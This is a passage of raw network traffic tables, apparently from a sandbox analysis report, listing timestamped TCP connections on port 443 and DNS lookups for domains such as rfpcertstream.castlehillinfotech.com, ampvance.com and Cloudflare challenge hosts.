                                                      Mar 5, 2024 14:23:45.064694881 CET49787443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:23:45.064716101 CET44349787104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.075520992 CET44349788104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.075582027 CET44349788104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.075618029 CET44349788104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.075716019 CET49788443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:23:45.075740099 CET44349788104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.075754881 CET44349788104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.075803995 CET49788443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:23:45.075803995 CET49788443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:23:45.077967882 CET49788443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:23:45.077986002 CET44349788104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.080183029 CET49792443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.080202103 CET44349792172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.080426931 CET49792443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.080426931 CET49792443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.080442905 CET44349792172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.094377041 CET44349786104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.094419956 CET44349786104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.094444036 CET44349786104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.094537020 CET44349786104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.094712019 CET49786443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:23:45.095143080 CET49786443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:23:45.095159054 CET44349786104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.098551035 CET49793443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.098594904 CET44349793172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.098731041 CET49793443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.099004984 CET49793443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.099018097 CET44349793172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.108041048 CET44349790172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.108252048 CET49790443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.108275890 CET44349790172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.108571053 CET44349790172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.109015942 CET49790443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.109015942 CET49790443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.109041929 CET44349790172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.109078884 CET44349790172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.111963987 CET49787443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:23:45.149857044 CET44349787104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.150146008 CET49787443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:23:45.150376081 CET44349787104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.150527000 CET49787443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:23:45.150681019 CET44349787104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.150801897 CET49787443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:23:45.151209116 CET44349787104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.151525021 CET44349787104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.151556015 CET49787443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:23:45.151567936 CET44349787104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.151598930 CET49787443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:23:45.151990891 CET44349787104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.152110100 CET49787443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:23:45.152117968 CET44349787104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.152335882 CET44349787104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.152447939 CET49787443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:23:45.152453899 CET44349787104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.152517080 CET44349787104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.152549028 CET49787443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:23:45.152554989 CET44349787104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.152580023 CET49787443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:23:45.153179884 CET44349787104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.153259993 CET49787443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:23:45.153265953 CET44349787104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.153440952 CET49787443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:23:45.153513908 CET44349787104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.153666019 CET49787443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:23:45.154019117 CET44349787104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.154145002 CET49787443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:23:45.154354095 CET44349787104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.154463053 CET49787443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:23:45.154470921 CET44349787104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.154503107 CET44349787104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.154530048 CET49787443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:23:45.154809952 CET49787443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:23:45.154814959 CET44349787104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:45.154835939 CET49787443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:23:45.163809061 CET49790443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.206437111 CET44349791172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.206805944 CET49791443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.206818104 CET44349791172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.207506895 CET44349791172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.207923889 CET49791443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.207923889 CET49791443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.207938910 CET44349791172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.208012104 CET44349791172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.251241922 CET49791443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.269534111 CET44349792172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.269824982 CET49792443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.269840956 CET44349792172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.270754099 CET44349792172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.270915985 CET49792443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.271177053 CET49792443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.271238089 CET44349792172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.271378040 CET49792443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.271390915 CET44349792172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.290944099 CET44349793172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.293000937 CET49793443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.293030024 CET44349793172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.294502020 CET44349793172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.294661045 CET49793443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.295067072 CET49793443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.295067072 CET49793443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.295084000 CET44349793172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.295146942 CET44349793172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.313002110 CET49792443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.344927073 CET49793443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.344949961 CET44349793172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.404007912 CET49793443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.502753019 CET44349790172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.502804041 CET44349790172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.502856016 CET49790443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.502891064 CET44349790172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.502912045 CET44349790172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.502976894 CET49790443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.504040956 CET49790443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.504060030 CET44349790172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.600119114 CET44349791172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.600163937 CET44349791172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.600235939 CET49791443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.600249052 CET44349791172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.600346088 CET44349791172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.600410938 CET49791443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.602018118 CET49791443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.602030039 CET44349791172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.666610956 CET44349792172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.666642904 CET44349792172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.666678905 CET44349792172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.666702986 CET49792443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.666713953 CET44349792172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.666752100 CET49792443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.666758060 CET44349792172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.666780949 CET44349792172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.666842937 CET49792443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.684056997 CET44349793172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.684120893 CET44349793172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.684159040 CET44349793172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.684202909 CET49793443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.684261084 CET44349793172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.684290886 CET44349793172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.684340000 CET49793443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.721092939 CET49792443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.721111059 CET44349792172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:45.721597910 CET49793443192.168.2.4172.67.165.105
                                                      Mar 5, 2024 14:23:45.721651077 CET44349793172.67.165.105192.168.2.4
                                                      Mar 5, 2024 14:23:53.008641005 CET49794443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:23:53.008729935 CET44349794104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:53.008950949 CET49794443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:23:53.009099960 CET49794443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:23:53.009128094 CET44349794104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:53.195249081 CET44349794104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:53.195689917 CET49794443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:23:53.195770025 CET44349794104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:53.196151018 CET44349794104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:53.196599960 CET49794443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:23:53.196683884 CET44349794104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:23:53.244990110 CET49794443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:24:08.189688921 CET44349794104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:24:08.189769030 CET44349794104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:24:08.190196037 CET49794443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:24:08.921377897 CET49794443192.168.2.4104.21.81.229
                                                      Mar 5, 2024 14:24:08.921439886 CET44349794104.21.81.229192.168.2.4
                                                      Mar 5, 2024 14:24:14.789944887 CET49797443192.168.2.4142.250.80.36
                                                      Mar 5, 2024 14:24:14.789978027 CET44349797142.250.80.36192.168.2.4
                                                      Mar 5, 2024 14:24:14.790067911 CET49797443192.168.2.4142.250.80.36
                                                      Mar 5, 2024 14:24:14.790541887 CET49797443192.168.2.4142.250.80.36
                                                      Mar 5, 2024 14:24:14.790559053 CET44349797142.250.80.36192.168.2.4
                                                      Mar 5, 2024 14:24:14.983338118 CET44349797142.250.80.36192.168.2.4
                                                      Mar 5, 2024 14:24:14.983653069 CET49797443192.168.2.4142.250.80.36
                                                      Mar 5, 2024 14:24:14.983669043 CET44349797142.250.80.36192.168.2.4
                                                      Mar 5, 2024 14:24:14.984150887 CET44349797142.250.80.36192.168.2.4
                                                      Mar 5, 2024 14:24:14.984462976 CET49797443192.168.2.4142.250.80.36
                                                      Mar 5, 2024 14:24:14.984572887 CET44349797142.250.80.36192.168.2.4
                                                      Mar 5, 2024 14:24:15.038676023 CET49797443192.168.2.4142.250.80.36
                                                      Mar 5, 2024 14:24:16.165887117 CET49798443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.165934086 CET4434979835.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.166019917 CET49798443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.166348934 CET49798443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.166368008 CET4434979835.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.254708052 CET49799443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.254756927 CET4434979935.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.254828930 CET49799443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.255687952 CET49799443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.255706072 CET4434979935.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.358088970 CET4434979835.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.358355045 CET49798443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.358376980 CET4434979835.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.358870029 CET4434979835.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.359292030 CET49798443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.359376907 CET4434979835.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.359425068 CET49798443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.405908108 CET4434979835.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.413666964 CET49798443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.438704967 CET4434979935.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.439016104 CET49799443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.439058065 CET4434979935.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.440541029 CET4434979935.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.440622091 CET49799443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.441119909 CET49799443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.441210985 CET4434979935.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.441261053 CET49799443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.481925964 CET4434979935.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.491883993 CET49799443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.491915941 CET4434979935.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.538768053 CET49799443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.563327074 CET4434979835.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.563451052 CET4434979835.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.563626051 CET49798443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.563646078 CET4434979835.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.563674927 CET49798443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.563730001 CET49798443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.564326048 CET49800443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.564357996 CET4434980035.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.564469099 CET49800443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.564810038 CET49800443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.564824104 CET4434980035.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.646610022 CET4434979935.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.646692991 CET4434979935.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.646895885 CET49799443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.646895885 CET49799443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.646917105 CET4434979935.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.646960020 CET49799443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.647090912 CET49799443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.647818089 CET49801443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.647905111 CET4434980135.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.648188114 CET49801443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.648858070 CET49801443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.648895979 CET4434980135.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.755314112 CET4434980035.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.756870031 CET49800443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.756880999 CET4434980035.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.757536888 CET4434980035.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.759398937 CET49800443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.759398937 CET49800443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.759532928 CET4434980035.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.759541988 CET49800443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.759598970 CET4434980035.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.804825068 CET49800443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.833003998 CET4434980135.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.833446026 CET49801443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.833462000 CET4434980135.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.833961964 CET4434980135.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.835397005 CET49801443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.835489035 CET4434980135.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.835604906 CET49801443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.835606098 CET49801443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.835638046 CET4434980135.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.965481043 CET4434980035.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.965588093 CET4434980035.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.965761900 CET49800443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.969501972 CET49800443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:16.969515085 CET4434980035.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:17.039922953 CET4434980135.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:17.040011883 CET4434980135.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:17.040421009 CET49801443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:17.040447950 CET4434980135.190.80.1192.168.2.4
                                                      Mar 5, 2024 14:24:17.040487051 CET49801443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:17.040518045 CET49801443192.168.2.435.190.80.1
                                                      Mar 5, 2024 14:24:23.289135933 CET4972480192.168.2.472.21.81.240
                                                      Mar 5, 2024 14:24:23.377182007 CET804972472.21.81.240192.168.2.4
                                                      Mar 5, 2024 14:24:23.377332926 CET4972480192.168.2.472.21.81.240
                                                      Mar 5, 2024 14:24:24.974808931 CET44349797142.250.80.36192.168.2.4
                                                      Mar 5, 2024 14:24:24.974884987 CET44349797142.250.80.36192.168.2.4
                                                      Mar 5, 2024 14:24:24.975008011 CET49797443192.168.2.4142.250.80.36
                                                      Mar 5, 2024 14:24:26.689176083 CET49797443192.168.2.4142.250.80.36
                                                      Mar 5, 2024 14:24:26.689207077 CET44349797142.250.80.36192.168.2.4
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Mar 5, 2024 14:23:10.323198080 CET53623211.1.1.1192.168.2.4
                                                      Mar 5, 2024 14:23:10.386881113 CET53577921.1.1.1192.168.2.4
                                                      Mar 5, 2024 14:23:10.923599958 CET53619981.1.1.1192.168.2.4
                                                      Mar 5, 2024 14:23:11.643153906 CET6246653192.168.2.41.1.1.1
                                                      Mar 5, 2024 14:23:11.643394947 CET4948353192.168.2.41.1.1.1
                                                      Mar 5, 2024 14:23:12.223747015 CET53494831.1.1.1192.168.2.4
                                                      Mar 5, 2024 14:23:12.239129066 CET53624661.1.1.1192.168.2.4
                                                      Mar 5, 2024 14:23:14.731338978 CET5500553192.168.2.41.1.1.1
                                                      Mar 5, 2024 14:23:14.731765985 CET5131353192.168.2.41.1.1.1
                                                      Mar 5, 2024 14:23:14.819797993 CET53550051.1.1.1192.168.2.4
                                                      Mar 5, 2024 14:23:14.820530891 CET53513131.1.1.1192.168.2.4
                                                      Mar 5, 2024 14:23:15.552891016 CET5135853192.168.2.41.1.1.1
                                                      Mar 5, 2024 14:23:15.553358078 CET5577753192.168.2.41.1.1.1
                                                      Mar 5, 2024 14:23:15.710871935 CET53513581.1.1.1192.168.2.4
                                                      Mar 5, 2024 14:23:15.729321957 CET53557771.1.1.1192.168.2.4
                                                      Mar 5, 2024 14:23:16.428253889 CET5084153192.168.2.41.1.1.1
                                                      Mar 5, 2024 14:23:16.428967953 CET6384353192.168.2.41.1.1.1
                                                      Mar 5, 2024 14:23:16.516021013 CET53508411.1.1.1192.168.2.4
                                                      Mar 5, 2024 14:23:16.517299891 CET53638431.1.1.1192.168.2.4
                                                      Mar 5, 2024 14:23:17.171006918 CET5151953192.168.2.41.1.1.1
                                                      Mar 5, 2024 14:23:17.172061920 CET6282153192.168.2.41.1.1.1
                                                      Mar 5, 2024 14:23:17.259318113 CET53515191.1.1.1192.168.2.4
                                                      Mar 5, 2024 14:23:17.260005951 CET53628211.1.1.1192.168.2.4
                                                      Mar 5, 2024 14:23:17.649992943 CET5040853192.168.2.41.1.1.1
                                                      Mar 5, 2024 14:23:17.650330067 CET6232753192.168.2.41.1.1.1
                                                      Mar 5, 2024 14:23:17.756850958 CET5419453192.168.2.41.1.1.1
                                                      Mar 5, 2024 14:23:17.756851912 CET5439053192.168.2.41.1.1.1
                                                      Mar 5, 2024 14:23:17.838857889 CET53623271.1.1.1192.168.2.4
                                                      Mar 5, 2024 14:23:17.839296103 CET53504081.1.1.1192.168.2.4
                                                      Mar 5, 2024 14:23:17.846118927 CET53541941.1.1.1192.168.2.4
                                                      Mar 5, 2024 14:23:17.846155882 CET53543901.1.1.1192.168.2.4
                                                      Mar 5, 2024 14:23:18.822792053 CET6239853192.168.2.41.1.1.1
                                                      Mar 5, 2024 14:23:18.823441029 CET5895553192.168.2.41.1.1.1
                                                      Mar 5, 2024 14:23:18.911571026 CET53623981.1.1.1192.168.2.4
                                                      Mar 5, 2024 14:23:18.912920952 CET53589551.1.1.1192.168.2.4
                                                      Mar 5, 2024 14:23:29.257915020 CET53583961.1.1.1192.168.2.4
                                                      Mar 5, 2024 14:23:34.857928991 CET138138192.168.2.4192.168.2.255
                                                      Mar 5, 2024 14:23:44.647175074 CET53605301.1.1.1192.168.2.4
                                                      Mar 5, 2024 14:23:48.214267969 CET53630371.1.1.1192.168.2.4
                                                      Mar 5, 2024 14:24:10.515165091 CET53606881.1.1.1192.168.2.4
                                                      Mar 5, 2024 14:24:11.213977098 CET53614841.1.1.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.165026903 CET5222653192.168.2.41.1.1.1
                                                      Mar 5, 2024 14:24:16.165312052 CET5823253192.168.2.41.1.1.1
                                                      Mar 5, 2024 14:24:16.253664970 CET53582321.1.1.1192.168.2.4
                                                      Mar 5, 2024 14:24:16.253685951 CET53522261.1.1.1192.168.2.4
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Mar 5, 2024 14:23:11.643153906 CET192.168.2.41.1.1.10xbf2aStandard query (0)rfpcertstream.castlehillinfotech.comA (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:23:11.643394947 CET192.168.2.41.1.1.10x85dbStandard query (0)rfpcertstream.castlehillinfotech.com65IN (0x0001)false
                                                      Mar 5, 2024 14:23:14.731338978 CET192.168.2.41.1.1.10x6bd7Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:23:14.731765985 CET192.168.2.41.1.1.10xa545Standard query (0)www.google.com65IN (0x0001)false
                                                      Mar 5, 2024 14:23:15.552891016 CET192.168.2.41.1.1.10xe28aStandard query (0)ampvance.comA (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:23:15.553358078 CET192.168.2.41.1.1.10xfb7fStandard query (0)ampvance.com65IN (0x0001)false
                                                      Mar 5, 2024 14:23:16.428253889 CET192.168.2.41.1.1.10x1341Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:23:16.428967953 CET192.168.2.41.1.1.10x55b6Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                      Mar 5, 2024 14:23:17.171006918 CET192.168.2.41.1.1.10x624Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:23:17.172061920 CET192.168.2.41.1.1.10x7d53Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                      Mar 5, 2024 14:23:17.649992943 CET192.168.2.41.1.1.10x5977Standard query (0)ampvance.comA (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:23:17.650330067 CET192.168.2.41.1.1.10x6840Standard query (0)ampvance.com65IN (0x0001)false
                                                      Mar 5, 2024 14:23:17.756850958 CET192.168.2.41.1.1.10xaa77Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:23:17.756851912 CET192.168.2.41.1.1.10x5655Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                      Mar 5, 2024 14:23:18.822792053 CET192.168.2.41.1.1.10xc65dStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:23:18.823441029 CET192.168.2.41.1.1.10xba6cStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                      Mar 5, 2024 14:24:16.165026903 CET192.168.2.41.1.1.10xfb8bStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                      Mar 5, 2024 14:24:16.165312052 CET192.168.2.41.1.1.10xa957Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
